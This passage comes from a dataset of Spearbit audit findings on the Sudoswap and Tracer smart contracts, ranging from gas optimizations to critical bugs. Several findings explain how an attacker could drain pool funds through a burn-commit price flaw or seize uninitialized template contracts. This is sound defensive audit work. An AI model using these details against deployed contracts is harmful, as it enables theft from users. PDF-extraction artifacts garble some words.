"https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently but in most use cases all of the data is re- quired.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Transfer last NFT instead of rst", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "When executing _sendAnyNFTsToRecipient() NFTs are retrieved by taking the rst available NFT and then sending it to nftRecipient. In (most) ERC721 implementations as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the rst NFT, swapping isnt necessary so gas is saved. Code related to LSSVMPairEnumerable.sol: 29 abstract contract LSSVMPairEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); take the first NFT // _nft.safeTransferFrom(address(this), nftRecipient, nftId); // this calls _beforeTokenTransfer of ERC721Enumerable ,! ,! ,! ,! } } } abstract contract ERC721Enumerable is ERC721, IERC721Enumerable { function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override { ,! ... _removeTokenFromOwnerEnumeration(from, tokenId); ... } function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private { ... uint256 lastTokenIndex = ERC721.balanceOf(from) - 1; uint256 tokenIndex = _ownedTokensIndex[tokenId]; // When the token to delete is the last token, the swap operation is unnecessary ==> we can make use of this if (tokenIndex != lastTokenIndex) { uint256 lastTokenId = _ownedTokens[from][lastTokenIndex]; _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index } // This also deletes the contents at the last position of the array delete _ownedTokensIndex[tokenId]; delete _ownedTokens[from][lastTokenIndex]; ,! ,! ,! ,! } } Code related to LSSVMPairMissingEnumerable.sol: 30 abstract contract LSSVMPairMissingEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ,! ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); // finally calls _remove() } } } library EnumerableSet { function _remove(Set storage set, bytes32 value) private returns (bool) { ... uint256 toDeleteIndex = valueIndex - 1; uint256 lastIndex = set._values.length - 1; if (lastIndex != toDeleteIndex) { // ==> we can make use of this bytes32 lastvalue = set._values[lastIndex]; set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is set._indexes[lastvalue] = valueIndex; // Replace lastvalue's index to valueIndex ,! ,! } set._values.pop(); delete set._indexes[value]; ... // Delete the slot where the moved value was stored // Delete the index for the deleted slot } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Simplify the connection between Pair and Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "There are two ways to interact between Pair and Router: 1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20 2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pa ir.routerSwapNFTsForToken, where the goal is to transfer NFTs Using two different patterns to solve the same problem makes the code more com- plex and larger than necessary. Patterns with cacheAssetRecipientNFTBa lance() are also error prone. abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(..., bool isRouter, ...) ... { ... if (isRouter) { LSSVMRouter router = LSSVMRouter(payable(msg.sender)); // Verify ,! if router is allowed require(_factory.routerAllowed(router), \"Not router\"); ... router.pairTransferERC20From( _token, routerCaller, _assetRecipient, inputAmount, pairVariant() ); ... } ... } } contract LSSVMRouter { function pairTransferERC20From(...) ... { // verify caller is a trusted pair contract require(factory.isPair(msg.sender, variant), \"Not pair\"); ... // transfer tokens to pair token.safeTransferFrom(from, to, amount); // transfer ERC20 from the original caller } ,! } 33 contract LSSVMRouter { function _swapNFTsForToken(...) ... { ... // Cache current asset recipient balance swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // transfer NFTs from the original caller } ... outputAmount += ,! swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); ... } } abstract contract LSSVMPair is Ownable, ReentrancyGuard { function cacheAssetRecipientNFTBalance() external { require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))),\"Not router\"); // Verify if router is allowed assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2; } ,! ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Cache array length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "An array length is frequently used in for loops. This value is an evaluation for every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. The following contains examples of the overusage of nftIds.length: 35 function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve ,! .getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use Custom Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Strings are used to encode error messages. With the current Solidity versions it is possible to replace them with custom errors, which are more gas efcient. Example of non-custom errors used in LSSVM : LSSVMRouter.sol#L604 require(block.timestamp <= deadline, \"Deadline passed\"); LSSVMRouter.sol#L788 require(outputAmount >= minOutput, \"outputAmount too low\"); Note: This pattern has been used in Ownable.sol#L6-L7", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Alternatives for the immutable Proxy variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "In the current LSSVMPairClone, the immutable variables stored in the proxy are sent along with every call. It may be possible to optimize this. 37", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Pair implementations may not be Proxies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The security of function pairTransferERC20From() relies on is- Pair(). In turn, isPair() relies on both isETHPairClone() and isERC20PairClone(). These functions check that a valid proxy is used with a valid implementation ad- dress. However, if the implementation address itself is a proxy it could link to any other contract. In this case security could be undermined depending on the implementation details. This is not how the protocol is designed, but future developers or developers using a fork of the code might not be aware of this.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "NFT and Token Pools can be signed orders instead", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Currently if any actor wants to create a buy/sell order they would have to create a new pool and pay gas for it. However, the advantage of this is unclear. TOKEN and NFT type pools can really be buy/sell orders at a price curve using signed data. This is reminiscent of how similar limit orders implemented by OpenSea, 1Inch, and SushiSwap currently function. Amending this in the codebase would make creating buy/sell orders free and should attract more liquidity and/or orders to Sudoswap.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Remove Code Duplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions like swapTokenForAnyNFTs and swapTokenForSpeci- ficNFTs are nearly identical and can be deduplicated by creating a common internal function. On the other hand this will slightly increase gas usage due to an extra jump.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Unclear Function Name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The functions _validateTokenInput() of both LSSVMPairETH and LSSVMPairERC20 do not only validate the token input but also transfer ETH/ERC20. The function name does not reasonably imply this and therefore can create some confusion. 40 abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(...) ... { ... _assetRecipient.safeTransferETH(inputAmount); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(...) ... { ... if (isRouter) { ... router.pairTransferERC20From(...); // transfer of tokens ... } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Inaccurate Message About MAX_FEE", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The function initialize() of LSSVMPair has an error message containing less than 100%. This is likely an error and should probably be less than 90%, as in the changeFee() function and because MAX_FEE == 90%. 41 // 90%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 9e17; function initialize(..., uint256 _fee, ...) external payable { ... require(_fee < MAX_FEE, \"Trade fee must be less than 100%\"); // 100% should be 90% ... ,! } function changeFee(uint256 newFee) external onlyOwner { ... require(newFee < MAX_FEE, \"Trade fee must be less than 90%\"); ... }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Inaccurate comment for assetRecipientNFTBalanceAtTransferStart", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The comment in LSSVMPair notes that assetRecipientNFTBal- anceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate. // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred ,! // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken. ,! uint256 internal `assetRecipientNFTBalanceAtTransferStart`; function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... assetRecipientNFTBalanceAtTransferStart = 1; ... } 42", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "IERC1155 not utilized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPair references IERC1155, but does not utilitze the interface within LSSVMPair.sol. import {IERC1155} from \"@openzeppelin/contracts/token/ERC1155/IERC1155.sol\"; The struct TokenToTokenTrade is dened in LSSVMRouter, but the contract does not utilize the interface either. struct TokenToTokenTrade { PairSwapSpecific[] tokenToNFTTrades; PairSwapSpecific[] nftToTokenTrades; } It is better to remove unused code due to potential confusion.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Use Fractions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "In some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read. 43 LSSVMPairFactory.sol#L28 LSSVMPair.sol#L25", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Two families of token libraries used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The Sudoswap contract imports token libraries from both Open- Zeppelin and Solmate. If Sudoswap sticks within one library family, then it will not be necessary to track potential issues from two separate families of libraries.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Pool token price is incorrect when there is more than one pending upkeep", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation price includes the current total supply but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) ,! The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: long.totalSupply() = 2000 User owns 1000 long pool tokens lastPriceTimestamp = 100 updateInterval = 10 frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. time 106: At 6 as they are now past totalPoolCommitments[6].longBurnAmount = 500, long.totalSupply -= 500 again as tokens are burned. User commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = Now the frontRunningInterval and are scheduled for the next update. the 5th update interval Finally, (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCom- mit[5].longBurnShortMintAmount = longBalance / (1000 + 500) which is a better price than what the user should have received. ID is executed by the pool keeper but at longPrice = longBalance / With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. 5 The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Critical" + ] + }, + { + "title": "No price scaling in SMAOracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The update() function of the SMAOracle contract doesnt scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of ChainlinkOracleWrapper contract does scale via toWad(). contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Two different invariantCheck variables used in PoolFactory.deployPool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool() function in the PoolFactory contract uses two different invariantCheck vari- ables: the one defined as a contracts instance variable and the one supplied as a parameter. Note: This was also documented in Secureums CARE-X report issue \"Invariant check incorrectly fixed\". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., ,! invariantCheck deploymentParameters.invariantCheck, ... ); // version 1 of ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... });", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Duplicate user payments for long commits when paid from balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Initial executionPrice is too high", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), ,! FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after the firstPrice will always be lower, therefore its funding rate payment will always go to the shorts and long pool token holders will incur a loss.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Paused state cant be set and therefore withdrawQuote() cant be executed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The checkInvariants() function of the InvariantCheck contract is called via the modifiers check- InvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommit- ter contracts, and it is meant to pause the contracts if the invariant checks dont hold. The aforementioned modifiers also contain the require(!paused, \"Pool is paused\"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheck- Contract modifier. Thus the paused variable will never be set to true, making withdrawQuote() impossible to be executed because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants dont hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants dont hold. The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkIn- variantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } ,! } 9 contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts then the previous price value is lost and the processing will not be accurate. There- fore, it is safer to store the new price only if pool.poolUpkeep() has been executed succesfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Pools can be deployed with malicious or incorrect quote tokens and oracles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployment of a pool via deployPool() is permissionless. The deployer provides several pa- rameters that have to be trusted by the users of a specific pool, these parameters include: oracleWrapper settlementEthOracle quoteToken invariantCheck If any one of them is malicious, then the pool and its value will be affected. Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool() ).", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "pairTokenBase and poolBase template contracts instances are not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The constructor of PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initial- ized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates setting them as the owner, and perform owner actions on contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. 13 contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Oracles are not updated before use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement / ETH prices. As it currently is, the code could operate on old data.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "getPendingCommits() underreports commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit(). The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIn- tervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits which leads to the checkInvariants function not checking the correct values.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Authenticity check for oracles is not effective", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender. Note: this check does protect against frontrunning the deployment transaction of the same pool. See Undocu- mented frontrunning protection. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\");", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Incorrect calculation of keeper reward", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper. The tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is based on the note at PoolKeeper.sol#244 which states the tip percent is in WAD units, but it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case as it is denominated in the quote token, but in WAD precision.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments() the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way. A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0. Note: Also see issue It is not possible to call executeCommitments() for multiple old commits. It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert. 17 function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override ,! onlyPool { ... uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max; ... while (i < upperBound) { if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) { // ,! lastPriceTimestamp shouldn't be updated too soon ... } } ... updateMintingFee(); // should do this once (in combination with _boundedIntervals==true) ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "It is not possible to call executeCommitments() for multiple old commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs: In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp. In the next run of poolUpkeep(), processing will stop at require(intervalPassed(),..), because block.timestamp hasnt increased. This means the rest of the commitments wont be executed by executeCommitments() and updateIntervalId, which is updated in executeCommitments(), will start lagging. 18 function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override ,! onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); // next time lastPriceTimestamp == ,! block.timestamp executePriceChange(_oldPrice, _newPrice); // should only to this once (in combination with ,! _boundedIntervals==true) IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are ,! processed } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Incorrect comparison in getUpdatedAggregateBalance()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When the value of data.updateIntervalId accidentally happens to be larger data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldnt happen. Although this is unlikely it is also very easy to prevent. function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { if (data.updateIntervalId == data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "updateAggregateBalance() can run out of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... uint256[] memory currentIntervalIds = unAggregatedCommitments[user]; uint256 unAggregatedLength = currentIntervalIds.length; for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; ... UserCommitment memory commitment = userCommitments[user][id]; ... if (commitment.updateIntervalId < updateIntervalId) { ... } else { ... storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays ,! in array } } delete unAggregatedCommitments[user]; unAggregatedCommitments[user] = storageArrayPlaceHolder; ... }", + "labels": [ + "Spearbit", + "Tracer", 